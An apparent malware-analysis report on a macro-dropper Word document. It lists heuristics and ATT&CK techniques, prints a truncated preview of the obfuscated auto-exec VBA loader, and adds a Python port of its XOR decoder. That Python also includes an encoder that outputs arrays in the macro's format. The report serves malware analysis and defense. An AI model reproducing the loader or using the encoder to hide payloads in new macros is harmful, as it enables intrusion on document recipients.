Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing obfuscated VBA macros: an auto-exec loader triggered by the Document_Open event. The document body carries a lure instructing the user to enable content, a common tactic for macro-based malware. The VBA code rebuilds a string at run time from numeric arrays, XOR-decoding each element against a character of a key that it reads from the document variable "zaxwoO" at a per-chunk offset, so neither the key nor the plaintext appears in the macro source. The reconstructed string is most likely a URL or command used to download and execute a second-stage payload, but it could not be recovered from this report: the extracted source is truncated and the key is stored as document metadata rather than in the VBA project.
Heuristics (8)
- ClamAV: Doc.Dropper.Agent-6355239-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6355239-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure [medium, SE_ENABLE_LURE]: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://office365.com/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8516 bytes | 8f761b76b7aa7b6ffd87df104b03b5fd0da2eb6858c0bcd3b5b0e89241e6db1d |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function EKPGgsSIQS(XgROlhVrtU As Variant, DYClKqmEoB As Integer)
Dim Eejspqclxn, MEplvGhBjh As String, WVgSgnugxN, PMOdYYtHBL
MEplvGhBjh = ActiveDocument.Variables("zaxwoO").Value()
Eejspqclxn = ""
WVgSgnugxN = 1
While WVgSgnugxN < UBound(XgROlhVrtU) + 2
PMOdYYtHBL = WVgSgnugxN Mod Len(MEplvGhBjh): If PMOdYYtHBL = 0 Then PMOdYYtHBL = Len(MEplvGhBjh)
Eejspqclxn = Eejspqclxn + Chr(Asc(Mid(MEplvGhBjh, PMOdYYtHBL + DYClKqmEoB, 1)) Xor CInt(XgROlhVrtU(WVgSgnugxN - 1)))
WVgSgnugxN = WVgSgnugxN + 1
Wend
EKPGgsSIQS = Eejspqclxn
End Function
Public Function ohTTCzBICY() As Variant
Dim kLADVHDUJYxPtdf As String
kLADVHDUJYxPtdf = EKPGgsSIQS(Array(8, 28, 33, 33), 1243)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(66, 10, 48, 53, 57, 21, 75, 8, 65, 50, 111, 93, 29, 43, 57, 19, 107, 119, 93, 12, 120, _
111, 111, 1, 103, 30, 43, 62, 80, 9, 10, 108, 87, 42, 61, 83, 122, 24, 12, 52, 33, _
119, 28, 0, 42, 101), 1247)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(30, 26, 53, 34, 1, 7, 49, 55, 63, 40, 65, 27, 45, 110, 37, 52, 17, 4, 26, 119, 30, _
52, 18, 61, 6, 19, 22, 6, 36, 19, 22, 52, 63, 42, 71, 50, 60, 121, 50, 41, 24, _
0, 33, 48, 54, 101, 35, 57, 23, 53), 150)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(123, 39, 28, 58, 0, 15, 43, 15, 37, 57, 40, 18, 47, 4, 57, 48, 2, 35, 46, 123, 11, _
36, 5, 50, 7, 22, 38, 30, 38, 25, 36, 46, 64, 7, 125, 31, 41, 57, 2, 43, 7, _
5, 19, 7, 48, 62, 20, 0, 122, 45), 50)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(20, 8, 32, 20, 86, 44, 21, 25, 37, 29, 38, 48, 7, 24, 5, 27, 10, 90, 20, 47, 8, _
41, 57, 47, 7, 51, 23, 37, 54, 57, 34, 8, 3, 18, 120, 8, 37, 14, 36, 4, 19, _
96, 12, 85, 69, 47, 85, 7, 61, 4), 971)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(44, 49, 22, 21, 28, 32, 13, 58, 59, 47, 35, 0, 116, 45, 6, 121, 5, 117, 16, 22, 7, _
34, 41, 38, 19, 16, 26, 113, 57, 119, 62, 80, 7, 36, 17, 15, 4, 48, 11, 10, 18, _
25, 5, 116, 99, 39, 24, 33, 54, 21), 0)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(11, 52, 44, 22, 114, 23, 112, 51, 1, 24, 90, 40, 18, 117, 12, 3, 46, 118, 45, 20, 21, _
112, 22, 118, 61, 49, 21, 17, 13, 45, 45, 84, 35, 27, 110, 15, 35, 47, 22, 58, 101, _
3, 47, 121, 61, 35, 23, 9, 63, 15), 475)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(32, 53, 43, 70, 44, 40, 59, 51, 1, 47, 3, 37, 57, 46, 114, 22, 5, 44, 46, 97, 45, _
96, 26, 18, 62, 117, 38, 66, 116, 7, 47, 15, 88, 16, 42, 4, 44, 5, 47, 24, 12, _
116, 21, 65, 55, 56, 54, 38, 13, 13), 726)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(45, 38, 22, 106, 15, 41, 53, 47, 33, 33, 2, 5, 33, 34, 17, 42, 21, 46, 27, 48, 120, _
11, 61, 18, 16, 63, 14, 5, 64, 8, 6, 3, 1, 4, 48, 105, 20, 3, 75, 121, 25, _
94, 47, 23, 7, 39, 90, 17, 40, 2), 1182)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(18, 3, 86, 42, 97, 47, 115, 86, 32, 11, 52, 53, 24, 5, 18, 97, 113, 57, 54, 56, 82, _
5, 57, 32, 53, 22, 66, 55, 43, 0, 9, 69, 120, 48, 59, 14, 99, 18, 113, 109, 41, _
44, 115, 48, 124, 23, 40, 113, 119, 104), 921)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(56, 121, 10, 9, 43, 50, 16, 15, 0, 47, 41, 14, 55, 8, 41, 33, 6, 53, 84, 24, 112, _
100, 112, 58, 2, 20, 0, 35, 28, 58, 49, 85, 44, 21, 69, 16, 5, 10, 7, 59, 6, _
12, 49, 19, 34, 13, 16, 105, 101, 45), 626)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(23, 48, 17, 6, 50, 16, 8, 47, 53, 59, 10, 37, 42, 40, 24, 44, 94, 3, 1, 6, 54, _
101, 35, 15, 37, 7, 13, 58, 119, 108, 22, 4, 92, 120, 6, 49, 12, 63, 54, 19, 31, _
36, 4, 30, 22, 19, 33, 48, 62, 36), 300)
kLADVHDUJYxPtdf = kLADVHDUJYxPtdf + EKPGgsSIQS(Array(49, 37, 9, 28, 60, 46, 9, 54, 122, 51, 16, 38, 54, 38, 24, 0, 114, 34, 41, 31, 34, _
118, 1, 5, 21, 24, 49, 45, 29, 59, 57, 116, 9, 19, 117, 103, 55, 5, 50, 114, 36, _
39, 48, 9
... (truncated)
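The decoder in the preview, EKPGgsSIQS, is a keyed XOR: for element i (1-based) of the array it takes key position (i Mod Len(key)) + offset, XORs that character's code with the array value, and appends the result; ohTTCzBICY then concatenates the chunks. The following Python is an added example, not code from the report or from the sample, that re-implements the decoder so the string can be recovered offline once the key is known, plus a small parser that pulls the (array, offset) pairs out of macro text such as the preview above (including lines split with VBA's ` _` continuation). The key itself is not in this report, so DEMO_KEY is a constructed placeholder; the real value comes from the Word document variable "zaxwoO". Because the macro reads the key at offset + position, and the visible offsets reach 1247, the real key must be longer than that: VBA's Mid() past the end of a string returns "" and Asc("") raises a run-time error, which the port mirrors with a ValueError instead of silently decoding garbage.

```python
import re

# Constructed placeholder key for demonstration only. The real sample reads its key
# from the Word document variable "zaxwoO", which this report does not contain.
# The macro indexes the key at offset + position with offsets up to 1247 in the
# visible source, so the real key must be longer than that; 1300 chars here.
DEMO_KEY = "".join(chr(0x21 + (i * 7) % 90) for i in range(1300))


def vba_decode(chunk, offset, key):
    """Python port of EKPGgsSIQS(XgROlhVrtU, DYClKqmEoB) from the preview.

    chunk  -- the numeric Array(...) passed as XgROlhVrtU
    offset -- the integer passed as DYClKqmEoB
    key    -- value of ActiveDocument.Variables("zaxwoO")
    """
    klen = len(key)
    out = []
    for i in range(1, len(chunk) + 1):      # WVgSgnugxN runs 1 .. UBound+1
        p = i % klen                         # PMOdYYtHBL = i Mod Len(key)
        if p == 0:
            p = klen
        pos = p + offset                     # 1-based position handed to Mid()
        if pos > klen:
            # VBA: Mid() past the end returns "" and Asc("") raises error 5,
            # so a too-short key crashes the macro rather than decoding.
            raise ValueError(f"key too short: Mid() position {pos} > {klen}")
        out.append(chr(ord(key[pos - 1]) ^ int(chunk[i - 1])))
    return "".join(out)


def vba_encode(plaintext, offset, key):
    """Inverse of vba_decode: the array a builder would emit for one chunk."""
    klen = len(key)
    arr = []
    for i, c in enumerate(plaintext, start=1):
        p = i % klen or klen
        arr.append(ord(c) ^ ord(key[p + offset - 1]))
    return arr


def render_call(arr, offset):
    """Format one chunk the way the macro source writes it."""
    return f"EKPGgsSIQS(Array({', '.join(map(str, arr))}), {offset})"


# Matches EKPGgsSIQS(Array(<numbers>), <offset>) once line continuations are joined.
CALL_RE = re.compile(r"EKPGgsSIQS\s*\(\s*Array\s*\(([^)]*)\)\s*,\s*(\d+)\s*\)")


def extract_chunks(vba_source):
    """Return [(array, offset), ...] in source order, joining VBA ' _' continuations."""
    joined = re.sub(r"[ \t]*_[ \t]*\r?\n[ \t]*", " ", vba_source)
    return [
        ([int(n) for n in re.findall(r"\d+", m.group(1))], int(m.group(2)))
        for m in CALL_RE.finditer(joined)
    ]


def recover_string(vba_source, key):
    """Concatenate every decoded chunk, as ohTTCzBICY() does with kLADVHDUJYxPtdf."""
    return "".join(vba_decode(arr, off, key) for arr, off in extract_chunks(vba_source))


if __name__ == "__main__":
    # Constructed plaintext and macro text; the report gives no real payload URL.
    secret = "http://example.invalid/stage2"
    first = render_call(vba_encode(secret[:4], 1243, DEMO_KEY), 1243)
    second = render_call(vba_encode(secret[4:], 1247, DEMO_KEY), 1247)
    macro = "s = " + first + "\ns = s + " + second + "\n"
    print(macro)
    print(recover_string(macro, DEMO_KEY))
```

To run this against the real sample, recover the value of the zaxwoO document variable from the Word file (it is document metadata, not part of the VBA project, so olevba's macro dump alone will not show it) and pass it as `key` together with the full macros.bas text; the truncated preview on this page yields only the chunks it shows.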